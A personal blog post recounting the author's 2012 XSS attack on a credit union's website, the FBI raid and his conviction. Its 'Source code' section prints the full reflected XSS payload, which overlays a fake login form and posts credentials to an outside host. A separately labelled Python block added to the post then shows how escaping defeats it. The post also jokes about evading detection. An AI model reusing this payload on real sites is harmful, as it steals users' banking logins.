
I Hacked a Bank and Got Arrested in 2012

Knock Knock

Seeing as a decade has passed, I sort of finally need to do it for me, to put it on paper, how it happened. How I got busted by the FBI, in mid-2012 on a warm summer day, while I was asleep in my bedroom at approximately 4 in the afternoon. Nobody except me was home at the time they arrived, peeping through my windows and walking across my lawn, but my mother, who was just getting home with my Grandma Butch (who coincidentally got me into computers in the first place, as a kid, with a Tandy 1500HD and DOS), saw some guys in suits buzzing around the house looking in windows and such. What happened between this and me actually waking up, I’m not sure. But where I come in is hearing my mother pounding very loudly on my bedroom door, which I kept locked while living at my parents’ house. “Marshall! Marshall, wake up!” she screamed. “What do you want? Go away, I’m sleeping,” I said. “The FBI is here,” she said, as I rolled out of bed, her still hammering on the door. I opened the door and immediately said, “That’s not funny,” but as soon as I got a good look at her face, I knew it wasn’t a joke to her. So I rounded the corner to go to the front door and opened it. Standing before me was one bigger agent, and another agent of about the same height but slimmer build. The short conversation that transpired from here on went something like:

“Marshall Whittaker?”
“Yes, what is this about?”
“Do you know anything about Truliant Federal Credit Union?”
“No, I don’t know what you’re talking about.”
“Well, we think you do.”
“Come in.”

The kitchen table

The slimmer one sat down in the kitchen, at the breakfast room table, and told me to have a seat. The first thing I thought was, what, this guy is telling me to have a seat where I live? I didn’t say anything and sat. As he was slapping a large manila envelope down on the glass top, all I could think of was that it felt like that scene out of the Matrix movie.

[Image: Matrix interrogation scene]

He tried to chat me up while the other agents were busily going in and out of my room, removing computers and other electronic equipment that had storage, such as USB flash drives, my PlayStation 3, burned CDs, etc. My memory gets a little blurry here as to what was actually said; there was a lot going on. I remember at one point they were telling me what types of charges I was going to be indicted with, and my mother handing me an entire bottle of Klonopin and saying, “I hope he never uses a computer again.” Well, thanks for that, Mom. In hindsight, I never should have talked to them at all, and should have lawyered up immediately, but my entire family, including myself, is very naive when it comes to police interrogations. As a result, I ended up blabbing on myself: about how it happened, why I thought it was a good idea to post on a forum about it, offering to sell the hack for bitcoin, then going back the next day and removing the post. Why I was idiotic enough to march my ass down to Truliant’s office in Winston-Salem and tell them about how I hacked them. Yes, I told them I’d done it, and showed them how. They stated that the vulnerability had been in the source for over two years untouched. I seem to think, this being before bug bounties were commonplace, that this is simply because they were a financial institution and nobody else was dumb enough to poke the beehive.

Source code

The actual hack? Technologically pathetic:

hxxp://www.truliantfcu.org/kb_landing.php?quickQuestionValue=blah%22%20id=%22silvercloudFrm%22%3E%3C/iframe%3E%3Cdiv%20name=%22fuckyou%22%20style=%22position:absolute;%20height:400px;%20width:850px;%20left:10;%20top:190;%20overflow:auto;%20z-index:99;%20background:%23fff;%22%3EPlease%20enter%20your%20Username%20and%20Password:%3Cbr%3E%3Cbr%3E%3Cform%20name=%22input%22%20action=%22http://joette.net/cgi-bin/unpw.pl%22%20method=%22post%22%3EUsername:%3Cinput%20type=%22text%22%20name=%22user%22%20/%3E%3Cbr%3EPassword:%20%3Cinput%20type=%22text%22%20name=%22pass%22%3E%3Cinput%20type=%22submit%22%20value=%22Login%22%20/%3E%3C/div%3E%3C/form%3E%20%3Ciframe%20style=%22border:0px;%20width:%200px;%20height:%200px;%22%20src=%22www.google.com%22%20%3C/iframe%3E&x=0&y=0&x=0&y=0           

The code will XSS a search page, hijacking it with some CSS to cover up the old page and create a new login-like page that uses embedded JavaScript that will send the login credentials off to an offsite server. Sometimes - just that simple.
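Why a request like the one above works, and what stops it, as an added example (not code from the original post or from the site). The template, the `/kb_search` path, the `bank.example` host and all function names are assumptions; the sample keeps only the break-out prefix of the quoted URL.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, quote, urlsplit

# Constructed sample: only the break-out prefix of the URL above, followed by
# a harmless <div>; bank.example is a placeholder host.
SAMPLE_URL = ("http://bank.example/kb_landing.php?quickQuestionValue="
              "blah%22%20id=%22silvercloudFrm%22%3E%3C/iframe%3E"
              "%3Cdiv%3Einjected%3C/div%3E&x=0&y=0")

# Assumed template (the post does not show the server side): the parameter is
# echoed as text and also placed in the URL of an iframe's src attribute.
TEMPLATE = ('<p>Results for: {text}</p>'
            '<iframe src="/kb_search?q={url}" id="silvercloudFrm"></iframe>')

def query_value(url, name="quickQuestionValue"):
    """Return the percent-decoded parameter, as server-side code receives it."""
    return parse_qs(urlsplit(url).query)[name][0]

def render_vulnerable(value):
    # Raw interpolation: a double quote in the value ends the src attribute.
    return TEMPLATE.format(text=value, url=value)

def render_hardened(value):
    # Encode per output context: HTML-escape for text; percent-encode, then
    # HTML-escape, for a URL component inside a quoted attribute.
    return TEMPLATE.format(text=escape(value, quote=True),
                           url=escape(quote(value, safe=""), quote=True))

class StartTags(HTMLParser):
    """Collect the element names an HTML parser sees in the markup."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def start_tags(markup):
    parser = StartTags()
    parser.feed(markup)
    parser.close()
    return parser.tags

if __name__ == "__main__":
    value = query_value(SAMPLE_URL)
    print("vulnerable:", start_tags(render_vulnerable(value)))
    print("hardened:  ", start_tags(render_hardened(value)))
```

In PHP, which the `.php` page name suggests, the same two steps are `rawurlencode()` and `htmlspecialchars()` with `ENT_QUOTES`.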

Unintended consequences

Note: If you ever do anything illegal like this, DO NOT TALK ABOUT IT. EVER.

They reminded me that I did it over Tor, which I suppose was by instinct, but it didn’t matter much if I was going to call them up, then go down to the office, then tell the damn FBI what I did when they asked, did it? I ended up finding this scrolled about 12 years back in Facebook Messenger, where I had shown a hacker buddy what I was up to as well. The sole good thing about getting caught is that now I can make this blog post without fear of being arrested again.

Note: Always encrypt your shit.

I had years of legal trouble, and was finally convicted of two counts of computer crimes (count two: “Attempt to Unlawfully Obtain Information by Computer from a Financial Institution” for this action, then another count for an unrelated hack involving a Department of Defense database I dumped). In the midst of the investigation, they found an unencrypted USB hard drive with the latter database on it, which I also received charges for. I was totally blacklisted from obtaining security clearance for 5 years after the end of two years probation. I ended up working fast food jobs for the next decade because of this. It still makes it difficult to find employment in infosec, so if you have an opening and think I may be a good fit, let me know! My lawyer expresses that I am now, a decade later, available in my full capacity to work in the computer field. In the end I’m left with this shiny piece of resume fodder:

[Image: Court Documents]

Don’t do it, kids, it’s not nearly as funny when the men in black show up.

The whole thing was colossally stupid, but it does make for a fun party story.

This post is licensed under CC BY 4.0 by the author.
